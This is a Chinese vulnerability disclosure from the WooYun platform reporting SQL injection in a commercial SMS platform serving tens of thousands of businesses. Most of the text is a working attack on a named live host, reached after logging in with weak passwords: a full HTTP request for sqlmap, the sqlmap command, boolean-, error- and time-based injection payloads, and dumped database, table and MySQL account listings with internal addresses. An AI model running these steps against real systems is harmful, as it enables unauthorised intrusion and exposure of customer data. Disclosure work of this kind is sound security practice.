漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-095402
漏洞标题:某短信平台SQL注入(涉及数万各行业厂商)
相关厂商:玄武科技
漏洞作者: Feei
提交时间:2015-02-04 14:37
修复时间:2015-03-21 14:38
公开时间:2015-03-21 14:38
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:20
漏洞状态:未联系到厂商或者厂商积极忽略
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-02-04: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-03-21: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
某短信平台SQL注入,数万各行各业用户(银行、证券、保险、医药、酒店、互联网等企业)数据泄露
详细说明:
WooYun: 某短信平台大量账户弱口令(涉及各行各业包括金融证券、酒店、医药、互联网等企业)
http://211.147.239.62/
#### 下面存为header
POST http://211.147.239.62/Statistics/SumStatistics/GetSumDepartment?startTime=2015-01-25&endTime=2015-01-25&mstype=SMS&onTime=true HTTP/1.1
Host: 211.147.239.62
Connection: keep-alive
Content-Length: 76
Pragma: no-cache
Cache-Control: no-cache
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://211.147.239.62
X-Requested-With: XMLHttpRequest
DNT: 1
Referer: http://211.147.239.62/Statistics/SumStatistics/Index
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Cookie: 替换为登陆后的COOKIE
MenusBlockIDs=10010,10011,10012,10013,10014,17000,12000,13000,14000,15000,18000,18200; ControllerName=SumStatistics
startTime=2015-01-25&endTime=2015-01-25&mstype=SMS&onTime=true
./sqlmap.py -r header --threads 10 --dbs -batch
由之前扫到的弱口令,登陆进来后找到以下注入点:
---
Place: POST
Parameter: startTime
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: startTime=-6517' OR (4508=4508)#&endTime=2015-01-25&mstype=SMS&on
Time=true
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: startTime=2015-01-25' AND (SELECT 6733 FROM(SELECT COUNT(*),CONCA
T(0x716c6f6371,(SELECT (CASE WHEN (6733=6733) THEN 1 ELSE 0 END)),0x716f697771
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '
kjoG'='kjoG&endTime=2015-01-25&mstype=SMS&onTime=true
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: startTime=2015-01-25' AND SLEEP(5) AND 'JYnp'='JYnp&endTime=2015-
01-25&mstype=SMS&onTime=true
---
漏洞证明:
#### DATABASES(16)
[*] 400_gsms
[*] 400_list
[*] commission
[*] gsms2_init
[*] gsms_init
[*] information_schema
[*] list2_init
[*] list_init
[*] mos2_gsms
[*] mos_gsms
[*] mos_gsms2_1
[*] mos_gsms_2
[*] mos_list2_1
[*] mysql
[*] performance_schema
[*] test
Database: mos_gsms2_1
+-------------------------------+---------+
| Table | Entries |
+-------------------------------+---------+
| gsms_msg_ticket | 4302497 |
| gsms_contact | 4191441 |
| gsms_statereport | 4031478 |
| gsms_deduct_record | 599589 |
| gsms_user_role | 360443 |
| gsms_user_role20130408 | 360110 |
| gsms_user_role20130409 | 360052 |
| gsms_msg_frame | 359263 |
| gsms_msg_pack | 241054 |
| gsms_non_white_list | 158632 |
| gsms_red_list | 124257 |
| gsms_account_carrier_price | 100360 |
| gsms_user | 58597 |
| gsms_user20130403 | 58523 |
| gsms_user20130401 | 58518 |
| gsms_user20130312 | 58275 |
| gsms_biztype_specnum | 53074 |
| gsms_enterprise_apply_detail | 49971 |
| gsms_user_business_type | 47656 |
| gsms_enterprise_specnum_bind | 39635 |
| gsms_user_account_bind | 33256 |
| gsms_business_type | 13511 |
| gsms_capital_account | 12545 |
| gsms_enterprise_apply | 12542 |
| gsms_user_ext | 12538 |
| gsms_capital_account20130409 | 12534 |
| chenxuan_saleman_count | 5391 |
| chenxuan_enterprise_count | 3945 |
| gsms_moticket | 3895 |
| gsms_channel_result_report | 3893 |
| gsms_user_operation_history | 3772 |
| gsms_channel_send_report | 2739 |
| gsms_specsvs_num | 2339 |
| gsms_realtime_send_statistic | 2248 |
| gsms_role_permission | 2240 |
| gsms_contact_group | 1847 |
| gsms_channel_carrier_map | 1217 |
| gsms_carrier_channel | 1199 |
| gsms_permission_depends | 1171 |
| chenxuan_carrier_type | 1154 |
| cx_sales_count | 1137 |
| gsms_permission | 718 |
| gsms_carrier_teleseg_map | 377 |
| gsms_region_code | 372 |
| gsms_white_redirect | 322 |
| chenxuan20130319 | 135 |
| gsms_sys_config | 117 |
| mos_user | 84 |
| gsms_charge_record | 82 |
| mos_user20130322 | 82 |
| gsms_role | 72 |
| gsms_deduct_report | 70 |
| gsms_role20130408 | 70 |
| chenxuan20130326 | 68 |
| gsms_workflow_process_record | 56 |
| gsms_enterprise_change_record | 52 |
| gsms_phrase | 46 |
| gsms_fetch_point | 42 |
| chenxuan33333 | 41 |
| gsms_region_carrier | 26 |
| gsms_industry | 22 |
| gsms_channel_change_detail | 17 |
| gsms_channel_change | 16 |
| gsms_charge_payment_map | 12 |
| gsms_payment_record | 11 |
| gsms_param | 7 |
| gsms_enterprise_access_record | 5 |
| gsms_sync_version | 5 |
| gsms_carrier | 4 |
| gsms_mms_material_group | 4 |
| seq | 3 |
| cx11111 | 2 |
| gsms_msg_type | 2 |
| gsms_specnum_region_priority | 2 |
| gsms_mms_material | 1 |
| gsms_monthly_ticket_amount | 1 |
| gsms_priority_map | 1 |
+-------------------------------+---------+
#### Database: commission [22 tables]
+-----------------------------+
| channel_all_400 |
| channel_all_mos |
| channel_sw |
| channel_type_3_400 |
| channel_type_3_mos |
| cx_mms |
| cx_sms |
| date_count_400 |
| date_count_mos |
| date_count_mos_copy |
| date_count_other |
| enterprise_blance_400 |
| enterprise_blance_mos |
| enterprise_new_400 |
| enterprise_new_mos |
| gift_record_400 |
| gift_record_mos |
| not_reconciled_record_400 |
| not_reconciled_record_40011 |
| not_reconciled_record_mos |
| not_reconciled_record_mos11 |
| swhzb |
+-----------------------------+
#### Database: 400_list
[9 tables]
+-------------------------+
| gsms_black_phone_list |
| gsms_cache_key_word |
| gsms_cache_phone_list |
| gsms_carrier |
| gsms_region_carrier_map |
| gsms_region_code |
| gsms_sync_effect_time |
| gsms_sync_version |
| gsms_white_phone_list |
+-------------------------+
#### Database: mos2_gsms
[148 tables]
+----------------------------------------+
| chenxuan_carrier_price |
| chenxuan_carrier_speed |
| chenxuan_carrier_type |
| chenxuan_chanage_userstate |
| chenxuan_quite_customer |
| chenxuan_red_list_1222 |
| gsms_account_carrier_price |
| gsms_account_carrier_price20140903 |
| gsms_adapter |
| gsms_alarm_enterprise |
| gsms_announcement |
| gsms_audit_record |
| gsms_biz_app_template |
| gsms_biz_app_template_detail |
| gsms_biz_application |
| gsms_biztype_specnum |
| gsms_biztype_specnum20141009 |
| gsms_business_type |
| gsms_capital_account |
| gsms_capital_account0101 |
| gsms_capital_account20140201 |
| gsms_capital_account20140903 |
| gsms_capital_account20141101 |
| gsms_capital_account20141201 |
| gsms_capital_account20150101 |
| gsms_carrier |
| gsms_carrier_channel |
| gsms_carrier_channel20131121 |
| gsms_carrier_channel20140217 |
| gsms_carrier_channel20140418 |
| gsms_carrier_channel20140514 |
| gsms_carrier_teleseg_map |
| gsms_channel_carrier_map |
| gsms_channel_carrier_map20130709 |
| gsms_channel_change |
| gsms_channel_change_detail |
| gsms_channel_region_map |
| gsms_channel_result_report |
| gsms_channel_send_report |
| gsms_charge_payment_map |
| gsms_charge_record |
| gsms_contact |
| gsms_contact_group |
| gsms_customer_group |
| gsms_customer_user |
| gsms_deduct_record |
| gsms_deduct_report |
| gsms_enterprise_access_record |
| gsms_enterprise_apply |
| gsms_enterprise_apply_detail |
| gsms_enterprise_apply_detail20141114 |
| gsms_enterprise_apply_detail20141118 |
| gsms_enterprise_apply_detail20141205 |
| gsms_enterprise_apply_detail20141208 |
| gsms_enterprise_apply_detail20141222 |
| gsms_enterprise_apply_detail20150105 |
| gsms_enterprise_apply_detail20150105_2 |
| gsms_enterprise_change_record |
| gsms_enterprise_specnum_bind |
| gsms_enterprise_specnum_bind20141114 |
| gsms_enterprise_specnum_bind20141118 |
| gsms_enterprise_specnum_bind20141205 |
| gsms_enterprise_specnum_bind20141208 |
| gsms_enterprise_specnum_bind20141222 |
| gsms_enterprise_specnum_bind20150105 |
| gsms_enterprise_specnum_bind20150105_2 |
| gsms_faq |
| gsms_fetch_confirm |
| gsms_fetch_point |
| gsms_file_handle_task |
| gsms_industry |
| gsms_knowledge |
| gsms_knowledge_display_channel |
| gsms_knowledge_group |
| gsms_message_record |
| gsms_message_statistics |
| gsms_mms_material |
| gsms_mms_material_group |
| gsms_monthly_ticket_amount |
| gsms_moreply |
| gsms_moticket |
| gsms_moticket_channel_msgid |
| gsms_msg_frame |
| gsms_msg_pack |
| gsms_msg_pack_revise |
| gsms_msg_ticket |
| gsms_msg_type |
| gsms_non_white_list |
| gsms_non_whitelist_export_recored |
| gsms_online |
| gsms_param |
| gsms_payment_record |
| gsms_payment_record20130510 |
| gsms_payment_record20131206 |
| gsms_permission |
| gsms_permission_depends |
| gsms_phrase |
| gsms_priority_map |
| gsms_realtime_send_statistic |
| gsms_red_list |
| gsms_region_carrier |
| gsms_region_carrier20131121 |
| gsms_region_code |
| gsms_region_map |
| gsms_role |
| gsms_role_permission |
| gsms_role_permission20140306 |
| gsms_service_statistics |
| gsms_specnum_region_priority |
| gsms_specsvs_num |
| gsms_statereport |
| gsms_statereport_map |
| gsms_survey_template |
| gsms_survey_template_option |
| gsms_sync_version |
| gsms_sys_alarm |
| gsms_sys_config |
| gsms_sys_config20140217 |
| gsms_template_group |
| gsms_template_recored |
| gsms_user |
| gsms_user20140805 |
| gsms_user20140818 |
| gsms_user20140901 |
| gsms_user20140905 |
| gsms_user_20141001 |
| gsms_user_20141101 |
| gsms_user_20141201 |
| gsms_user_20150101 |
| gsms_user_account_bind |
| gsms_user_account_bind20140903 |
| gsms_user_audit |
| gsms_user_business_type |
| gsms_user_ext |
| gsms_user_ext_bak_err |
| gsms_user_msg_type |
| gsms_user_operation_history |
| gsms_user_role |
| gsms_verify |
| gsms_virtual_channel_map |
| gsms_white_redirect |
| gsms_workflow_process_record |
| info_delete |
| insert_static_gsms_msg_frame |
| insert_static_gsms_msg_ticket |
| insert_static_gsms_statereport |
| mos_user |
| seq |
+----------------------------------------+
#### Database: mos_gsms[90 tables]
+-----------------------------------+
| chenxuan_carrier_type |
| chenxuan_charge_record |
| gsms_account_carrier_price |
| gsms_biztype_specnum |
| gsms_biztype_specnum20121219 |
| gsms_biztype_specnum20130109 |
| gsms_business_type |
| gsms_capital_account |
| gsms_capital_account1206 |
| gsms_capital_account20130409 |
| gsms_capital_account20130507 |
| gsms_carrier |
| gsms_carrier_channel |
| gsms_carrier_channel0830 |
| gsms_carrier_channel20130423 |
| gsms_carrier_channel_copy |
| gsms_carrier_teleseg_map |
| gsms_channel_carrier_map |
| gsms_channel_change |
| gsms_channel_change_detail |
| gsms_channel_region_map |
| gsms_channel_result_report |
| gsms_channel_result_report0629 |
| gsms_channel_send_report |
| gsms_channel_send_report0629 |
| gsms_charge_payment_map |
| gsms_charge_record |
| gsms_charge_record0816 |
| gsms_charge_record0906 |
| gsms_charge_record1010 |
| gsms_charge_record20131113 |
| gsms_contact |
| gsms_contact_group |
| gsms_deduct_record |
| gsms_enterprise_specnum_bind |
| gsms_enterprise_specnum_bind0815 |
| gsms_fetch_point |
| gsms_fetch_point0904 |
| gsms_file_handle_task |
| gsms_monthly_ticket_amount |
| gsms_moticket |
| gsms_moticket_channel_msgid |
| gsms_msg_frame |
| gsms_msg_pack |
| gsms_msg_ticket |
| gsms_msg_type |
| gsms_non_white_list |
| gsms_non_whitelist_export_recored |
| gsms_param |
| gsms_payment_record |
| gsms_permission |
| gsms_permission_depends |
| gsms_priority_map |
| gsms_realtime_send_statistic |
| gsms_red_list |
| gsms_red_list0906 |
| gsms_region_carrier |
| gsms_region_code |
| gsms_region_map |
| gsms_role |
| gsms_role_permission |
| gsms_specnum_region_priority |
| gsms_specsvs_num |
| gsms_specsvs_num0831 |
| gsms_statereport |
| gsms_sync_version |
| gsms_sys_config |
| gsms_user |
| gsms_user20130227 |
| gsms_user20130312 |
| gsms_user20130401 |
| gsms_user_account_bind |
| gsms_user_business_type |
| gsms_user_business_type20121108 |
| gsms_user_business_type20121116 |
| gsms_user_ext |
| gsms_user_msg_type |
| gsms_user_operation_history |
| gsms_user_role |
| gsms_verify |
| gsms_virtual_channel_map |
| gsms_white_redirect |
| gsms_white_redirect0813 |
| gsms_white_redirect20121121 |
| mos_user |
| mos_user20130129 |
| mos_user20130322 |
| mos_user20130403 |
| mos_user20140121 |
| seq |
+-----------------------------------+
#### Users(56)
[*] 'cactiuser'@'192.168.10.89'
[*] 'censerver'@'192.168.10.89'
[*] 'censerver'@'localhost'
[*] 'chengxuan'@'192.168.%'
[*] 'chengxuan'@'localhost'
[*] 'innotop'@'192.168.10.83'
[*] 'monitor'@'192.168.10.89'
[*] 'monyog'@'192.168.%'
[*] 'monyog'@'localhost'
[*] 'moshengkuo'@'192.168.%'
[*] 'mscheck'@'127.0.0.1'
[*] 'mscheck'@'192.168.%'
[*] 'mscheck'@'localhost'
[*] 'private'@'192.168.10.86'
[*] 'private'@'localhost'
[*] 'program'@'172.16.200.10'
[*] 'program'@'172.16.202.101'
[*] 'program'@'172.16.202.102'
[*] 'program'@'172.16.202.203'
[*] 'program'@'183.232.65.44'
[*] 'program'@'192.168.%'
[*] 'program'@'192.168.10.100'
[*] 'program'@'192.168.10.101'
[*] 'program'@'192.168.10.102'
[*] 'program'@'192.168.10.103'
[*] 'program'@'192.168.10.104'
[*] 'program'@'192.168.10.120'
[*] 'program'@'192.168.10.150'
[*] 'program'@'192.168.10.151'
[*] 'program'@'192.168.10.188'
[*] 'program'@'192.168.10.223'
[*] 'program'@'192.168.10.68'
[*] 'program'@'192.168.10.81'
[*] 'program'@'192.168.10.84'
[*] 'program'@'192.168.10.86'
[*] 'program'@'192.168.10.87'
[*] 'program'@'192.168.10.88'
[*] 'program'@'192.168.10.92'
[*] 'program'@'192.168.10.93'
[*] 'program'@'192.168.10.96'
[*] 'program'@'192.168.10.97'
[*] 'program'@'192.168.10.98'
[*] 'program'@'localhost'
[*] 'repl'@'192.168.10.%'
[*] 'repl'@'192.168.10.130'
[*] 'root'@'%'
[*] 'root'@'192.168.%'
[*] 'root'@'localhost'
[*] 'super'@'192.168.%'
[*] 'super'@'192.168.10.86'
[*] 'super'@'localhost'
[*] 'wanglianguang'@'%'
[*] 'wanglianguang'@'192.168.%'
[*] 'wanglianguang'@'localhost'
[*] 'xiaozhuan'@'192.168.%'
[*] 'xiaozhuan'@'localhost'
从结果看应该所有产品数据库都在,光短信库用户就有50000多家,短信数量千万级。还有400等产品
涉及厂商(短信发送数较多的):【**银行】【东风悦达起亚】【安利中国】【BMW中国】【人人快递网】【中通物流】【我要旅行网】【娃哈哈集团】【GXG】【唯品会】【酷讯】等等
修复方案:
- 找到类似场景可能出现的地方进行排查后对参数进行过滤
- 增加验证码难度以及加上次数限制
- 上WAF
版权声明:转载请注明来源 Feei@乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝